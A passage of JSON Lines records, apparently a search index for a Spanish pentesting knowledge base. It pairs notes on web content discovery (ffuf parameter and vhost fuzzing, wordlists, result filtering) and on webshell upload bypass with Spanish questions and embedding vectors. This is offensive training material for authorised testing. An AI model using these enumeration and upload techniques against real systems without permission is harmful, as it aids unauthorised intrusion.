`zip`, `old`.\n- **RecursiΓ³n**: feroxbuster baja solo a las carpetas que encuentra (gobuster no).\n- **Wordlists**: `raft-large-words`, `directory-list-2.3-medium`. `common.txt` es nivel junior (Trampas de enumeraciΓ³n).\n- **Filtrar ruido** en ffuf: `-fc 404` (cΓ³digo), `-fs 1234` (tamaΓ±o), `-mc 200,301,302`.", "indexar": "cΓ³mo filtro los resultados de ffuf por cΓ³digo o tamaΓ±o para evitar el ruido?", "v": [-0.10776, -0.02344, -0.07107, -0.14088, -0.07308, -0.14822, -0.08192, 0.08062, -0.00685, -0.14412, -0.08414, -0.12461, 0.01698, -0.04748, 0.02748, -0.19354, 0.04191, -0.02481, -0.02797, -0.06016, -0.033, -0.12815, -0.08935, -0.06714, -0.02577, 0.02395, 0.05105, 0.09088, -0.17763, -0.05707, 0.13416, 0.08985, 0.17211, -0.03496, -0.19178, 0.08647, 0.15901, 0.09113, -0.05907, 0.15218, 0.00563, 0.07744, -0.08468, 0.03151, -0.00806, -0.07473, -0.07431, 0.08149, 0.09945, 0.00634, -0.03054, -0.04838, 0.05021, 0.037, -0.0332, -0.07186, -0.00292, -0.02453, -0.01578, -0.11592, 0.0214, -0.08293, -0.0092, -0.02138, -0.06839, -0.02393, 0.11679, 0.11528, -0.00575, -0.00614, -0.00565, -0.03926, -0.07148, -0.05953, 0.06889, 0.06013, 0.03594, -0.09993, -0.01846, 0.00621, 0.00569, 0.00483, 0.01545, -0.12293, -0.04939, -0.03003, 0.0149, -0.06239, -0.04313, -0.10518, -0.03513, 0.01797, 0.0221, -0.03863, 0.06002, -0.10158, 0.08029, 0.02844, -0.03857, 0.0426, 0.12753, -0.11616, 0.06549, 0.0318, 0.14011, 0.04825, 0.02692, -0.06209, 0.04233, -0.06103, -0.0236, -0.02243, -0.05685, -0.03801, -0.11509, -0.03527, 0.03225, -0.06382, 0.0205, -0.03717, -0.08649, 0.08157, -0.09251, 0.01271, -0.02687, 0.06591, 0.11997, 0.01416, 0.03032, -0.0267, -0.02087, 0.07625, 0.00301, -0.02406, -0.01512, 0.0262, -0.05662, 0.00779, 0.00908, -0.02913, -0.01799, 0.02898, 0.02365, 0.05576, 0.01336, 0.05052, 0.03056, 0.01136, -0.07432, -0.01202, 0.03382, 0.02063, 0.01506, -0.06746, -0.0163, 0.09673, 0.03635, -0.02091, 0.04157, -0.02853, -0.04587, 0.09844, 0.03868, -0.01036, 0.10369, -0.00838, 0.03748, -0.06057, 0.05675, -0.11671, 0.00183, -0.03829, 0.10894, -0.13931, -0.0345, 0.03898, -0.01457, 0.01879, 0.01523, -0.03345, 0.01947, 0.11478, 0.03483, -0.04454, 0.05904, -0.00613, 0.06284, -0.0178, -0.10091, -0.00354, 0.03895, 0.03848, 0.01977, -0.01764, 0.00019, -0.01523, 0.0409, -0.04137, -0.0162, -0.03616, -0.00977, 0.02863, -0.02608, -0.02617, 0.01239, 0.00633, 0.02106, -0.01377, 0.0459, 0.05399, 0.08293, -0.02734, -0.00934, -0.035, -0.03931, 0.11323, 0.00275, -0.0273, 0.04698, 0.04027, 0.03992, 0.02164, 0.0319, 0.03835, -0.02664, -0.01735, -0.02604, -0.03815, 0.05299, 0.013, -0.01065, 0.01241, -0.03355, 0.03337, 0.02911, 0.0463, -0.04354, 0.03712, -0.0563, -0.07564, 0.01957, -0.04235, -0.01413, 0.00536, 0.00434, -0.03921, -0.04862, -0.00164, -0.02812, -0.01779, -0.01767, -0.04399, -0.0165, -0.03868, 0.03694, -0.00998]} +{"tipo": "pregunta", "herramienta": "Content discovery", "perfil": "PENTESTERS", "fichero": "conocimiento/02 - Explotacion web/Content discovery.md", "tema": "explotacion web", "fuente": null, "licencia": null, "texto": "## MΓ‘s allΓ‘ de directorios\n```bash\nffuf -u http://IP/page.php?FUZZ=test -w params.txt # descubrir parΓ‘metros (o usa arjun)\nffuf -H \"Host: FUZZ.objetivo.htb\" -u http://IP -w subs.txt # vhosts β†’ Vhosts y subdominios\n```", "indexar": "cual es una herramienta para descubrir los parΓ‘metros de un sitio web", "v": [-0.04424, 0.04763, -0.14946, -0.17824, 0.03777, -0.1337, -0.01664, -0.09211, -0.03518, -0.07516, -0.0325, -0.06284, -0.02355, -0.09386, 0.05215, 0.11736, 0.15672, -0.09918, 0.05361, -0.02907, -0.03115, -0.01942, -0.13647, -0.02941, -0.13152, -0.04362, 0.09212, -0.01067, -0.20048, 0.07334, -0.00385, 0.06333, 0.01312, -0.03087, -0.09296, -0.0179, 0.0502, 0.05606, -0.02466, 0.00018, -0.04903, -0.07707, -0.02146, 0.09635, -0.04371, 0.025, -0.12362, -0.06142, 0.00832, -0.00938, 0.00443, -0.09038, -0.14233, 0.03555, 0.01364, -0.1188, 0.21852, -0.12192, 0.06139, -0.1024, -0.08259, 0.00978, -0.10956, -0.05745, -0.10438, -0.06153, -0.02584, 0.05774, -0.03164, 0.03776, 0.08407, -0.01035, 0.03126, -0.0707, 0.06078, 0.03699, 0.07534, 0.02998, 0.10004, -0.05162, 0.08361, 0.03372, -0.06787, 0.03789, -0.13205, -0.03984, 0.06981, -0.08915, 0.02302, -0.09134, 0.00116, 0.07639, -0.05611, 0.03481, -0.0559, -0.10306, 0.0923, -0.02196, 0.01544, -0.00767, 0.08238, -0.07634, -0.12363, 0.08565, 0.06227, 0.02099, -0.03552, 0.03573, -0.10403, -0.04101, 0.09717, 0.01487, -0.00657, -0.02985, -0.03888, 0.04877, -0.01435, -0.05734, -0.03547, -0.1477, -0.02689, 0.11397, -0.11087, -0.04577, 0.01656, 0.01551, -0.0045, 0.02751, 0.04354, -0.06711, 0.0426, -0.0479, -0.06322, 0.06224, 0.01458, 0.02193, 0.0309, -0.05203, 0.02156, -0.05178, -0.00701, -0.04139, -0.04726, -0.03476, 0.09746, -0.03796, -0.03068, 0.01159, -0.13113, 0.03712, -0.09119, 0.03813, -0.00696, 0.06308, -0.0678, 0.0149, -0.04249, 0.04546, -0.10365, -0.03167, -0.02694, -0.02866, 0.11535, -0.01851, 0.01519, -0.02692, -0.01303, 0.01699, 0.04278, 0.03898, 0.01735, 0.0495, 0.04902, -0.06141, -0.00855, -0.02871, -0.09933, -0.03574, 0.06794, -0.0733, -0.01571, 0.00445, -0.04879, -0.02695, -0.05761, -0.02966, 0.08274, -0.06943, -0.07457, 0.02978, -0.00495, 0.02294, -0.02075, -0.04677, 0.07262, 0.02857, -0.02171, -0.0341, 0.03791, -0.04446, -0.03798, -0.03291, -0.02146, -0.04964, 0.0053, 0.04463, 0.00663, -0.08171, -0.03875, -0.00876, 0.02613, -0.0355, 0.00296, -0.05733, -0.03997, -0.04173, 0.05238, -0.01362, -0.03415, 0.0203, 0.04533, -0.00229, 0.07703, 0.01233, -0.01321, 0.00301, 0.03103, 0.02251, -0.01645, -0.01656, 0.01662, -0.07624, -0.03264, 0.01813, 0.05869, -0.02783, 0.05864, -0.02342, -0.07308, -0.01545, 0.01207, 0.05123, 0.001, -0.00758, 0.01678, -0.04738, -0.04841, -0.01009, -0.0389, -0.06175, -0.0312, -0.0046, 0.05139, -0.04274, 0.0354, -0.03684]} +{"tipo": "pregunta", "herramienta": "Content discovery", "perfil": "PENTESTERS", "fichero": "conocimiento/02 - Explotacion web/Content discovery.md", "tema": "explotacion web", "fuente": null, "licencia": null, "texto": "## MΓ‘s allΓ‘ de directorios\n```bash\nffuf -u http://IP/page.php?FUZZ=test -w params.txt # descubrir parΓ‘metros (o usa arjun)\nffuf -H \"Host: FUZZ.objetivo.htb\" -u http://IP -w subs.txt # vhosts β†’ Vhosts y subdominios\n```", "indexar": "que programa me sirve para encontrar los subdominios o nombres de dominio ocultos", "v": [0.07141, 0.01604, -0.04495, -0.07098, -0.01796, -0.06942, 0.03345, -0.0789, -0.11203, -0.04715, 0.0566, -0.15675, 0.02431, -0.25541, -0.02077, -0.10751, 0.25644, -0.08392, -0.00688, 0.00301, 0.00356, -0.05817, -0.04542, -0.04484, -0.00361, -0.15782, 0.05036, -0.03056, 0.0044, 0.08588, 0.04743, -0.08831, 0.02938, -0.10325, -0.06666, -0.0807, 0.0551, -0.08985, 0.06648, 0.13849, 0.0577, -0.04776, -0.10674, 0.10326, -0.03928, 0.02957, -0.11325, 0.08703, 0.02708, -0.19181, -0.03631, -0.05731, -0.04335, -0.04996, 0.02627, -0.12008, -0.03823, -0.06589, -0.04889, 0.05439, -0.03547, -0.11252, 0.10694, 0.02838, 0.01717, -0.11471, 0.00121, 0.07415, -0.04403, -0.01894, 0.01471, 0.0144, 0.08899, 0.00779, 0.07316, -0.04265, 0.06984, -0.08135, 0.01868, -0.07404, 0.00366, 0.01945, -0.01499, 0.06778, -0.12056, -0.06796, -0.09072, -0.03537, -0.03852, -0.02222, 0.07627, 0.07666, -0.03824, 0.0404, 0.04425, 0.01821, 0.07528, 0.01694, -0.07477, -0.00126, 0.12751, 0.10505, -0.11, 0.10986, 0.03958, 0.16058, -0.00454, -0.09878, -0.04182, 0.08231, 0.03567, -0.03742, -0.08708, 0.01695, -0.0254, 0.06165, -0.0125, 0.03528, 0.0939, -0.04814, -0.10511, -0.03054, 0.00902, 0.03688, 0.00485, -0.03302, 0.01107, -0.02642, -0.01355, -0.0384, 0.01078, -0.01048, 0.00489, -0.02663, -0.06113, -0.03107, 0.10501, 0.04287, 0.02061, -0.03279, 0.03484, 0.02848, -0.04692, 0.0197, -0.00167, -0.01928, 0.16094, -0.09361, 0.0626, -0.03126, -0.0588, 0.01915, -0.00571, 0.04191, -0.03769, 0.00701, -0.06496, 0.01357, -0.06168, 0.02354, -0.07529, 0.00748, -0.08222, -0.06805, -0.00812, -0.04232, 0.03022, -0.01617, 0.0443, 0.05965, 0.0156, 0.07671, 0.01869, -0.07261, -0.03238, 0.00613, 0.03378, -0.06351, 0.01682, 0.01973, -0.05945, 0.01974, 0.06074, 0.11222, -0.02388, 0.04552, 0.0153, -0.0439, -0.04112, -0.0227, 0.02454, -0.02587, -0.09732, -0.01576, -0.10182, 0.00254, 0.03864, 0.01047, 0.05003, -0.06484, -0.03838, -0.02947, 0.0036, 0.00288, -0.03081, 0.00491, -0.00821, -0.0324, 0.05942, 0.02332, -0.01502, -0.0584, 0.00932, -0.02252, -0.0086, -0.03774, -0.08144, 0.03499, -0.04058, -0.04096, -0.07821, -0.02916, 0.03271, 0.01436, 0.02768, -0.04438, 0.06115, 0.00653, 0.012, 0.02025, -0.03013, -0.03856, -0.02844, -0.0242, 0.00668, -0.03843, -0.02163, 0.04605, -0.00925, 0.02896, -0.06665, 0.04888, 0.08792, -0.00928, -0.02911, -0.04462, -0.01061, 0.01001, -0.02656, 0.05168, -0.02317, 0.05764, -0.00796, -0.01162, 0.06495, 0.03386]} +{"tipo": "pregunta", "herramienta": "Content discovery", "perfil": "PENTESTERS", "fichero": "conocimiento/02 - Explotacion web/Content discovery.md", "tema": "explotacion web", "fuente": null, "licencia": null, "texto": "## MΓ‘s allΓ‘ de directorios\n```bash\nffuf -u http://IP/page.php?FUZZ=test -w params.txt # descubrir parΓ‘metros (o usa arjun)\nffuf -H \"Host: FUZZ.objetivo.htb\" -u http://IP -w subs.txt # vhosts β†’ Vhosts y subdominios\n```", "indexar": "con que puedo probar diferentes hostes virtuales en una direccion IP", "v": [0.0124, 0.03227, -0.30768, -0.08223, 0.02789, -0.07235, 0.09649, -0.06724, 0.05899, -0.19079, 0.11304, -0.06807, -0.00353, -0.0782, 0.05642, 0.10443, 0.20395, -0.03802, 0.11044, -0.01302, 0.00193, 0.08509, -0.201, 0.0669, 0.01323, 0.09063, -0.02485, 0.03749, 0.01504, -0.09631, -0.1047, -0.12601, -0.00162, -0.0065, -0.10408, -0.17216, -0.00294, 0.06741, 0.0462, 0.02143, 0.14016, 0.06873, -0.04433, -0.00131, 0.03468, 0.02004, -0.0224, -0.11509, -0.10578, -0.09448, -0.10451, -0.12217, -0.04283, 0.00451, -0.06882, 0.00785, 0.06395, -0.04903, 0.02394, -0.01833, -0.01382, 0.02114, 0.03132, 0.12535, 0.09911, -0.06519, -0.0484, -0.00351, -0.19417, -0.09928, -0.04553, 0.01316, -0.02544, 0.04422, 0.01909, -0.0118, -0.03085, 0.0341, 0.04605, 0.04585, 0.01996, 0.06557, -0.08941, 0.07923, -0.01498, -0.11319, 0.00108, -0.14235, 0.06961, -0.06514, 0.1124, 0.07382, -0.04726, 0.00884, 0.00195, -0.0253, 0.08714, 0.01906, -0.05531, -0.02032, 0.00172, 0.095, -0.05473, 0.10044, 0.05656, 0.11988, 0.0623, 0.00634, 0.08638, -0.0275, -0.0713, -0.03179, -0.05902, -0.02713, 0.0452, -0.02869, -0.01117, -0.02053, 0.06804, -0.01912, -0.03576, -0.0088, -0.01539, 0.004, 0.01574, 0.06906, -0.00461, 0.04685, 0.05988, 0.00405, -0.00606, -0.00471, -0.00639, -0.04266, 0.05063, 0.03103, 0.04211, -0.03319, 0.04289, -0.01721, 0.01305, 0.01366, 0.03215, -0.09354, 0.03497, -0.03242, -0.01439, -0.10182, -0.08667, 0.04905, 0.0405, 0.03229, 0.01981, 0.05405, -0.08829, 0.06476, -0.05173, -0.07066, -0.01522, 0.07949, 0.02397, 0.02629, 0.01789, -0.01675, 0.03947, -0.02602, -0.12922, -0.00203, 0.04505, 0.01185, -0.07863, 0.06458, -0.0401, 0.02997, -0.03171, 0.03872, -0.05007, -0.04178, 0.0096, -0.0297, 0.01, -0.03207, -0.02222, -0.0371, 0.03703, 0.00273, 0.04012, 0.05047, -0.02294, 0.05317, 0.0323, -0.0111, -0.03453, 0.03997, 0.06416, -0.04701, 0.01167, -0.03109, -0.03166, -0.07317, -0.03516, -0.0331, -0.06516, -0.02986, -0.00747, 0.00958, -0.04162, 0.05959, -0.01921, -0.01398, 0.05365, -0.0332, 0.04041, -0.07605, -0.06809, 0.05881, 0.02084, -0.03077, -0.02639, -0.03375, -0.00343, 0.02291, 0.00874, 0.01225, 0.03551, 0.06229, 0.02481, 0.02115, 0.01857, 0.01028, 0.01356, 0.0246, 0.00768, -0.03105, 0.03039, 0.00218, 0.03995, -0.01484, -0.04354, 0.00977, -0.02544, 0.04914, -0.00966, -0.01342, -0.00894, -0.04313, -0.0909, 0.04577, -0.04078, -0.03909, -0.06044, 0.02949, 0.03674, 0.00608, -0.05107, 0.01778]} +{"tipo": "pregunta", "herramienta": "Content discovery", "perfil": "PENTESTERS", "fichero": "conocimiento/02 - Explotacion web/Content discovery.md", "tema": "explotacion web", "fuente": null, "licencia": null, "texto": "## QuΓ© hacer con lo encontrado\nCada ruta nueva = superficie nueva β†’ vuelve a Hacking web y pruΓ©bala (login β†’ Authentication attacks, `?file=` β†’ Directory traversal, upload β†’ File upload bypass).\n\nRelacionado: Burp Suite Β· EnumeraciΓ³n web Β· OSCP MOC", "indexar": "con quΓ© puedo verificar si un sitio web permite subida de archivos?", "v": [0.0522, 0.10242, -0.27771, -0.03902, 0.07229, -0.07746, -0.02518, -0.13986, -0.00813, -0.16002, -0.07952, -0.14009, -0.02655, -0.08515, 0.04563, 0.02989, 0.07757, -0.04858, 0.11114, -0.04227, 0.14633, -0.09924, 0.02886, -0.17483, 0.00215, -0.0008, 0.03587, 0.10672, -0.06618, -0.07942, -0.02262, 0.03367, -0.02886, 0.12494, -0.06459, 0.05167, 0.08978, 0.08959, 0.01636, -0.13837, -0.06621, 0.05255, -0.01316, -0.06718, -0.03681, -0.06955, -0.01149, -0.11517, 0.0124, -0.05577, 0.04724, -0.00798, -0.09272, -0.02704, -0.17133, 0.0166, 0.05044, -0.04615, 0.10016, -0.06102, -0.05881, 0.05599, -0.05895, 0.03119, -0.11255, 0.00251, -0.03145, 0.11874, 0.01481, -0.05005, 0.03184, 0.00689, 0.05582, -0.01481, -0.01089, -0.09219, 0.02391, -0.04665, -0.00924, 0.02353, 0.04617, 0.06713, -0.0281, 0.0349, -0.11948, -0.05292, -0.06639, -0.11697, -0.0124, -0.03996, 0.12296, 0.0142, 0.07241, -0.01006, -0.08513, -0.07044, 0.02569, -0.04906, -0.01956, -0.01567, -0.00155, -0.05289, -0.0179, 0.09473, 0.092, 0.12128, -0.01089, 0.03648, -0.07094, -0.08554, 0.11211, 0.00173, -0.12318, 0.0221, -0.07883, 0.06483, -0.01638, -0.06544, -0.02376, -0.08342, -0.01551, 0.03189, 0.00218, 0.00012, -0.03376, -0.00741, 0.05984, 0.10316, -0.05423, 0.00814, 0.01589, 0.01557, -0.02725, -0.00742, -0.0386, 0.01327, 0.01276, 0.02934, 0.05553, -0.01211, 0.04503, 0.00465, -0.06397, 0.03658, 0.11443, -0.01333, -0.1339, 0.00424, -0.15168, -0.04066, -0.09268, -0.00375, -0.01861, 0.08208, 0.02583, 0.03762, -0.00372, -0.12283, -0.0364, 0.05741, -0.0069, 0.03438, 0.00676, 0.04665, -0.00957, 0.03492, 0.00264, 0.06103, -0.00519, -0.01388, -0.04046, 0.03321, -0.02394, -0.15697, 0.08808, 0.02773, -0.04051, -0.03606, 0.04805, -0.09239, -0.05684, 0.00111, 0.01592, 0.02566, -0.10542, -0.02269, 0.0864, -0.0443, 0.01383, 0.04062, -0.01816, 0.01805, -0.08151, 0.00755, 0.03971, -0.01224, -0.0301, 0.04141, 0.01094, -0.02176, -0.04149, -0.06273, -0.05194, -0.0543, -0.00415, -0.03172, 0.02089, -0.02398, 0.04934, 0.00579, -0.04468, -0.04395, 0.08389, -0.09136, -0.03086, 0.01287, 0.02835, 0.00478, -0.0453, -0.04199, -0.00531, 0.01654, 0.01387, 0.03035, -0.00042, 0.02931, 0.0006, -0.04487, -0.00462, 0.07623, -0.05679, 0.02051, -0.0277, 0.01129, 0.04198, -0.00456, 0.02778, 0.04251, -0.08045, -0.00769, -0.01121, 0.08674, -0.00347, -0.04085, -0.01305, -0.04706, -0.05622, -0.01721, 0.00356, -0.02983, -0.00813, -0.00822, -0.03124, -0.01528, 0.02739, 0.01772]} +{"tipo": "pregunta", "herramienta": "Content discovery", "perfil": "PENTESTERS", "fichero": "conocimiento/02 - Explotacion web/Content discovery.md", "tema": "explotacion web", "fuente": null, "licencia": null, "texto": "## QuΓ© hacer con lo encontrado\nCada ruta nueva = superficie nueva β†’ vuelve a Hacking web y pruΓ©bala (login β†’ Authentication attacks, `?file=` β†’ Directory traversal, upload β†’ File upload bypass).\n\nRelacionado: Burp Suite Β· EnumeraciΓ³n web Β· OSCP MOC", "indexar": "existe alguna herramienta para probar ataques de travesΓ­a en directorios?", "v": [0.0199, 0.03043, -0.23677, -0.13745, -0.01513, 0.01407, 0.12355, 0.07262, 0.02994, 0.02491, 0.01127, -0.04423, 0.00772, -0.09193, 0.00418, 0.01014, 0.14433, 0.06074, 0.08026, -0.08172, -0.00567, 0.04939, -0.14641, 0.00606, -0.09692, -0.07349, -0.06384, -0.01191, -0.15791, -0.00533, -0.06083, 0.04845, 0.13212, -0.08746, -0.03837, -0.12491, -0.04465, -0.03162, 0.15034, 0.06119, 0.04174, -0.07794, -0.12797, 0.04275, 0.00966, -0.06886, -0.07725, -0.00955, -0.10452, 0.00087, 0.07417, -0.0003, -0.19524, -0.03903, -0.00463, -0.1344, 0.15766, -0.09841, 0.0633, -0.03104, -0.08941, 0.02674, -0.00747, -0.01642, -0.01096, -0.15133, -0.00551, -0.09463, -0.17014, 0.10934, -0.00574, 0.05231, -0.01377, 0.06669, -0.05552, -0.05064, 0.09629, 0.09713, 0.05373, 0.01206, 0.11601, 0.00962, -0.10106, -0.03287, -0.16552, -0.10202, 0.01955, -0.04391, 0.00229, -0.08652, -0.00805, 0.00115, -0.05624, -0.0164, 0.03166, 0.01685, 0.01349, -0.06797, 0.03932, -0.03365, 0.11339, 0.02449, -0.09041, 0.13217, -0.02339, 0.03313, -0.03043, 0.01153, -0.04677, -0.00247, -0.0169, -0.00301, -0.00962, -0.02583, 0.0504, 0.02093, -0.02373, -0.05056, 0.06394, -0.05444, -0.0189, 0.03013, -0.14453, 0.09658, -0.00689, 0.00544, -0.01369, 0.02981, 0.02063, -0.09716, 0.05977, -0.02446, -0.03939, 0.03445, -0.03964, 0.00479, 0.01262, -0.09817, 0.04975, -0.05831, -0.00167, 0.06328, -0.07629, -0.05899, -0.05047, 0.08115, -0.02466, -0.01326, -0.0907, 0.05771, -0.01424, -0.04825, -0.0403, 0.08661, 0.00909, 0.00014, 0.02304, 0.02419, -0.0807, 0.11622, 0.04225, -0.03065, 0.01374, 0.06478, -0.04735, -0.04308, -0.00157, 0.02688, 0.04972, 0.03711, 0.02332, 0.10403, 0.06648, -0.0669, 0.02543, -0.04004, -0.07479, -0.06606, -0.001, -0.06367, 0.03168, -0.01562, -0.02682, -0.06072, 0.02918, -0.07147, 0.05608, 0.03038, 0.0584, 0.05072, 0.05893, -0.01147, -0.00888, -0.02787, 0.04455, 0.01482, 0.02566, -0.04876, 0.00442, 0.00632, -0.02195, -0.01759, -0.07884, -0.10576, 0.03697, 0.05337, -0.01819, -0.03825, -0.01527, 0.00063, 0.06383, -0.00152, 0.04944, -0.0318, -0.03954, 0.04147, 0.02941, 0.0335, 0.00142, 0.00029, -0.05706, 0.00308, 0.0281, 0.06443, -0.01637, 0.03553, 0.01345, -0.07543, -0.00355, 0.01622, 0.04103, -0.04042, 0.00565, -0.03206, 0.02688, 0.00116, 0.01622, 0.00852, -0.04311, 0.01714, -0.05148, 0.05894, 0.02122, -0.00514, -0.03019, -0.04853, -0.03814, -0.00281, -0.04016, -0.06203, 0.00956, 0.02593, 0.0174, -0.02135, -0.00098, 0.00916]} +{"tipo": "pregunta", "herramienta": "Content discovery", "perfil": "PENTESTERS", "fichero": "conocimiento/02 - Explotacion web/Content discovery.md", "tema": "explotacion web", "fuente": null, "licencia": null, "texto": "## QuΓ© hacer con lo encontrado\nCada ruta nueva = superficie nueva β†’ vuelve a Hacking web y pruΓ©bala (login β†’ Authentication attacks, `?file=` β†’ Directory traversal, upload β†’ File upload bypass).\n\nRelacionado: Burp Suite Β· EnumeraciΓ³n web Β· OSCP MOC", "indexar": "quΓ© programa sirve para simular ataques de autenticaciΓ³n contra rutas nuevas?", "v": [-0.0404, 0.02325, -0.23542, -0.12555, 0.1314, -0.13583, -0.02608, -0.07227, 0.01096, 0.06083, -0.04911, -0.16424, 0.06973, -0.00127, 0.02059, -0.07404, 0.03034, -0.01426, 0.19219, 0.01753, -0.02296, -0.09363, 0.05778, -0.08713, -0.07759, -0.01303, 0.06932, 0.05234, 0.00896, -0.11009, 0.02998, 0.0277, 0.1227, -0.10453, -0.00713, -0.00267, 0.01279, 0.02331, 0.07973, 0.06584, 0.11693, -0.01806, -0.09614, -0.0446, 0.13963, -0.02615, 0.00325, -0.10935, 0.00406, -0.05539, -0.03281, 0.00452, -0.09215, -0.01, 0.00804, -0.11621, -0.02806, -0.15919, 0.03072, -0.07266, -0.00449, -0.01434, 0.06497, -0.07094, 0.10413, -0.03317, 0.08243, -0.03896, -0.02501, 0.03567, -0.03108, 0.02146, 0.09849, 0.01847, -0.07845, -0.06764, -0.0385, 0.04632, 0.0372, -0.01784, 0.02588, 0.01321, -0.05112, 0.05123, -0.03068, 0.02692, 0.07342, -0.01692, -0.01101, -0.05982, -0.01221, 0.06556, 0.04309, 0.05671, 0.04332, -0.02243, 0.10807, -0.10138, 0.05488, -0.01512, -0.02639, -0.12923, -0.13107, 0.10947, -0.08258, 0.10332, -0.03756, -0.03622, -0.01125, 0.02441, -0.02888, -0.03525, -0.08815, 0.02777, 0.03466, 0.01085, -0.04519, -0.04887, 0.09592, -0.07612, -0.09114, 0.02636, -0.05712, 0.08901, -0.01068, 0.09491, -0.02321, 0.05904, -0.04196, -0.01564, -0.00606, -0.03685, -0.00486, -0.01917, -0.10153, -0.11011, 0.04202, -0.05007, 0.00098, -0.03748, 0.05445, 0.15995, 0.00413, -0.02242, -0.06693, 0.04546, 0.00943, -0.04483, -0.06729, 0.06733, 0.03666, -0.00245, 0.02656, 0.10911, -0.0769, -0.01998, -0.01582, -0.05937, -0.05358, 0.12101, 0.00229, 0.01769, -0.08199, -0.01966, 0.03756, -0.06288, -0.01793, -0.00823, 0.08637, 0.11066, 0.00659, 0.0999, 0.11792, -0.05346, 0.03298, 0.07047, -0.0271, -0.07635, 0.02543, -0.04737, -0.07714, -0.02167, 0.03216, 0.02038, -0.0173, -0.0418, -0.03354, 0.04454, 0.05046, 0.04199, -0.01406, -0.02764, -0.00954, -0.00509, 0.04015, 0.02534, 0.02599, -0.01799, 0.03208, 0.01197, 0.00234, -0.06109, -0.05088, -0.05204, 0.08089, 0.16111, 0.00113, -0.04974, 0.01597, 0.09625, 0.03629, -0.02195, 0.04786, -0.00574, -0.03065, -0.06436, 0.05588, 0.02919, 0.05422, -0.00076, 0.00842, -0.02002, -0.06359, 0.05893, -0.03047, 0.01752, -0.0271, -0.08131, 0.01805, -0.00633, 0.04723, -0.07403, -0.00117, 0.00106, 0.0166, -0.03246, 0.07869, 0.01538, -0.06185, -0.04664, -0.04984, 0.05234, 0.00753, -0.08247, -0.05511, -0.00114, -0.06834, -0.01471, 0.0231, -0.00576, -0.06163, 0.01845, 0.0571, 0.02408, 0.01613, 0.02535]} +{"tipo": "pregunta", "herramienta": "File upload bypass", "perfil": "PENTESTERS", "fichero": "conocimiento/02 - Explotacion web/File upload bypass.md", "tema": "explotacion web", "fuente": null, "licencia": null, "texto": "# File upload bypass\n\n> Subir una webshell cuando el upload estΓ‘ \"filtrado\". Vector de Hacking web. Manipula la subida con Burp Suite.", "indexar": "que herramienta sirve para subir una webshell cuando el upload estΓ‘ filtrado", "v": [0.01493, 0.03757, -0.26264, -0.14724, 0.04375, -0.18117, -0.16034, -0.09168, 0.04937, -0.10232, -0.09927, -0.10356, 0.00652, -0.12282, 0.00679, -0.0484, -0.05066, -0.16438, 0.01898, 0.03535, 0.0248, 0.09835, -0.08804, -0.20204, -0.1279, -0.00501, 0.08677, 0.03836, -0.22824, -0.051, 0.07445, 0.00406, 0.02466, -0.00764, -0.03247, -0.03807, -0.06019, 0.05206, -0.04463, 0.00272, -0.03824, 0.06533, -0.11818, 0.0457, -0.03434, 0.02263, -0.0157, -0.08428, 0.0866, 0.12314, 0.03549, -0.11031, -0.11214, 0.05314, -0.12297, -0.06801, 0.19012, -0.19675, 0.00349, -0.09624, -0.06765, 0.01037, 0.00806, -0.03645, -0.08485, -0.04839, -0.10655, 0.00297, -0.03731, 0.03139, 0.0275, -0.01373, 0.07973, 0.021, -0.04241, 0.00469, 0.01179, -0.01712, -0.01802, -0.05775, 0.02445, -0.01563, -0.02436, 0.03678, -0.14762, -0.08947, 0.04017, -0.03211, 0.00289, -0.05806, 0.02291, 0.04553, 0.03106, -0.04853, 0.03762, -0.067, 0.04449, -0.10199, -0.00894, -0.06922, 0.10709, -0.10584, 0.01512, 0.06094, 0.0542, 0.09028, 0.05028, -0.05527, -0.07817, 0.04995, 0.06969, 0.03485, 0.00036, -0.0687, -0.00824, 0.05575, -0.0065, -0.08924, -0.0116, -0.06416, 0.06119, -0.03195, -0.06984, -0.04654, -0.02945, 0.04115, -0.00492, 0.05251, -0.02154, -0.07112, -0.0292, 0.05043, -0.0489, 0.05894, 0.00657, -0.0836, 0.01799, -0.04413, -0.00499, -0.0954, -0.01553, 0.05811, -0.0944, -0.07149, -0.01348, -0.00577, -0.01774, -0.0414, -0.10682, -0.03946, 0.01271, -0.06426, 0.01926, 0.02134, -0.00165, 0.00617, -0.0118, -0.02375, -0.0955, -0.0252, -0.00244, -0.04131, 0.07316, 0.05793, -0.00705, 0.04664, -0.04131, -0.02863, 0.06957, 0.01011, 0.0334, 0.03413, 0.01232, -0.06802, 0.02944, -0.05387, -0.07223, -0.02896, 0.02667, -0.03122, 0.01894, -0.01538, 0.00329, 0.00257, -0.03652, -0.06633, 0.00011, -0.07326, -0.04627, 0.02438, -0.05684, -0.01638, -0.01376, -0.00433, 0.06656, 0.00806, -0.01029, -0.08692, 0.05774, 0.00768, -0.04196, -0.05575, -0.01052, -0.0353, -0.0445, 0.00873, 0.03481, -0.06039, -0.01018, 0.03305, -0.03452, 0.03206, 0.01494, -0.05455, 0.04798, -0.02047, 0.04731, 0.00408, -0.05397, 0.01085, 0.00827, -0.00531, 0.04521, 0.00369, -0.00015, 0.04868, 0.00552, -0.0133, -0.00504, 0.00557, -0.01028, -0.01591, 0.01019, -0.01535, -0.01264, -0.0554, 0.03404, 0.01711, -0.05639, -0.05587, -0.00066, 0.0215, 0.02883, -0.00435, -0.03486, -0.03654, -0.02, -0.00915, 0.00347, -0.05824, -0.04065, -0.01144, 0.02283, -0.00995, 0.00556, 0.00464]} +{"tipo": "pregunta", "herramienta": "File upload bypass", "perfil": "PENTESTERS", "fichero": "conocimiento/02 - Explotacion web/File upload bypass.md", "tema": "explotacion web", "fuente": null, "licencia": null, "texto": "# File upload bypass\n\n> Subir una webshell cuando el upload estΓ‘ \"filtrado\". Vector de Hacking web. Manipula la subida con Burp Suite.", "indexar": "con que puedo manipular las subidas en una web vulnerable a bypass", "v": [0.27943, 0.14246, -0.22104, 0.00184, -0.04952, 0.11197, -0.11062, 0.02075, -0.04161, -0.12547, 0.07072, -0.04175, -0.01331, 0.03142, -0.07973, -0.04493, -0.10985, -0.04575, 0.02405, 0.00282, 0.10556, -0.0336, 0.05996, -0.04955, 0.10527, 0.05109, -0.01789, 0.01224, -0.14887, -0.02641, -0.09009, 0.12345, -0.05644, 0.08155, 0.01829, -0.03845, -0.10435, 0.07042, 0.04904, -0.0642, -0.05339, -0.0711, -0.04593, -0.08053, 0.04235, -0.03541, -0.115, -0.05781, 0.05261, 0.05754, -0.03873, -0.01044, -0.15396, -0.04264, -0.01146, -0.02897, 0.12697, -0.11083, -0.00886, -0.05901, -0.02141, 0.11303, 0.03962, 0.05798, -0.00996, -0.07394, 